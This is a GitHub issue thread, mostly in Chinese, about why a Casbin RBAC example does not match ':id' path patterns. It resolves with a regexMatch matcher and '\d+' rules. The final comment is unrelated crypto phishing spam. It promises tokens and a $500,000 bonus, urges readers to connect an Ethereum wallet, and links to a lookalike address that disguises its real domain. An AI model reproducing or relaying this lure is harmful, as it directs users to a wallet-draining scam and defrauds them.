### ISSUE TITLE
试验了下，不支持正则匹配

### ISSUE THREAD

**Issue by he426100** [donjan-deng/hyperf-casbin-example#1]
Enforcer::enforce('user1', '/admin/roles/:id', 'PUT') true
Enforcer::enforce('user1', '/admin/roles/1', 'PUT') false

**Comment by donjan-deng** [comment]
需要相应Model,参考RBAC with pattern
<https://casbin.org/zh-CN/editor>

**Comment by he426100** [comment]
看了下casbin源码，它已经注册了个正则匹配的函数，得改 casbin-rbac-model
```
[matchers]
m = g(r.sub, p.sub) && regexMatch(r.obj, p.obj) && r.act == p.act
```

rules里面写 `:id` 不行，换 `\d+`。
我看你写 :id，还以为 casbin 支持

**Comment by masa2el** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
